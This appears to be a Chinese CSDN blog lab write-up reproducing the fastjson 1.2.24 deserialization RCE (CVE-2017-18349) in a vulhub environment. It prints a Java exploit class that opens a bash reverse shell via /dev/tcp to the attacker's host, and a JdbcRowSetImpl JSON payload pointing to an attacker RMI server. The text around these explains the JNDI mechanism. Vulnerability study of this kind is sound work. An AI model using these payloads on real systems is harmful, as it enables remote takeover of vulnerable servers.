fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)

已于 2023-06-24 17:41:19 修改
阅读量783 收藏
点赞数 1
文章标签: web安全 网络安全 安全 系统安全 java
于 2023-06-24 17:34:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51163834/article/details/131363972
版权

一、fastjson简介

fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。

二、漏洞原理

攻击者访问存在fastjson漏洞的目标靶机,通过burpsuite抓包改包,以json格式添加com.sun.rowset.JdbcRowSetlmpl恶意信息发送给目标机。

存在漏洞的目标靶机对json反序列化的时候,会执行我们构造的恶意信息(访问rmi服务器),靶机服务器就会向rmi服务器请求待执行命令。

rmi服务器请求加载远程机器的class(这个远程机器是我们搭建好的恶意站点,提前将漏洞利用代码编译得到.class文件,并上传至恶意站点),得到攻击者构造好的命令(创建文件、反弹shell等)

rmi将远程加载得到的class(恶意代码),作为响应返回给靶机服务器。

靶机执行了恶意代码,被攻击者成功利用。

三、漏洞复现

目标靶机:Ubuntu         ip:192.168.80.157

攻击机:kali                   ip:192.168.80.133

启动环境前要先进入到对应的目录下。如本次对Fastjson 1.2.47远程命令执行漏洞进行复习,先进入到其目录下。

启动环境:

docker-compose up -d

访问8090端口,当出现如下图所示,即环境搭建成功

提前使用javac编译java文件生成一个恶意类

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.80.133/6666 0>&1"); 
       }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit(); 
   }
}

将恶意类放到kali端

开启web服务,让rmi服务器能访问到恶意类文件

访问6969端口,查看是否成功开启web服务

开启RMI服务,将恶意类放到服务器上 

同时监听6666端口(在java中写入的是通过6666端口反弹shell)

使用burpsuite对192.168.80.157:8090抓包,构造payload并发送。

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.80.133:6869/#Exploit",
        "autoCommit":true
    }
}

 

反弹shell成功

59_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3026
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 882
fastjson 1.2.24 反序列化
Fastjson漏洞CVE-2017-18349
GalaxySpaceX的博客
05-20 1146
Fastjson漏洞CVE-2017-18349
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349
00勇士王子的博客
03-22 5697
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
服务攻防-开发组件安全&Jackson&FastJson各版本&XStream&CVE环境复现
siu~
01-28 1239
知识点 1、J2EE-组件Jackson-本地demo&CVE(数据处理) 2、J2EE-组件FastJson-本地demo&CVE(数据处理) 3、J2EE-组件XStream-本地demo&CVE(数据处理) 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 457
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
fastjson1.2.24反序列化RCE
最新发布
06-24
fastjson1.2.24反序列化RCE
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1395
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2182
Fastjson反序列化漏洞复现
漏洞库】Fastjson_1.2.24_rce
yuan_boss的博客
09-08 964
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
fastjson1.2.24漏洞复现与理解
Shanfenglan's blog
11-02 545
文章目录1. 搭建环境2. 测试2.1 找到json数据解析点1. 搭建环境2. 测试2.1 找到json数据解析点2.2 传入恶意参数进一步确定是否含有可利用漏洞2.2 利用漏洞进行命令执行 1. 搭建环境 在vulhub上下载 https://github.com/vulhub/vulhub/archive/master.zip 2. 测试 2.1 找到json数据解析点 直接访问服务端部传递任何数据得到的页面如下: 1. 搭建环境 在vulhub上下载 https://github.com/vulh
fastjson 1.2.24/1.2.47漏洞复现
good good study
01-09 6204
当我们在渗透测试中,抓包的时候发现返回的流量内容存在json格式时,我们就可以想它是不是使用了fastjson
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2163
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1112
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值